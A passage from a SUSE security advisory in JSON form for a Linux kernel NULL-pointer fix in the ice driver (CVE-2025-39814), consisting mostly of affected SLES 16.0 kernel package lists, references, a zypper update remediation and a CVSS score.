the deref in the trace above.\n\nIntroduce a flag to be set when the creation of the auxbus device is\nsuccessful, to avoid multiple NULL pointer checks in ice_unplug_aux_dev().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39814",
"url": "https://www.suse.com/security/cve/CVE-2025-39814"
},
{
"category": "external",
"summary": "SUSE Bug 1249895 for CVE-2025-39814",
"url": "https://bugzilla.suse.com/1249895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
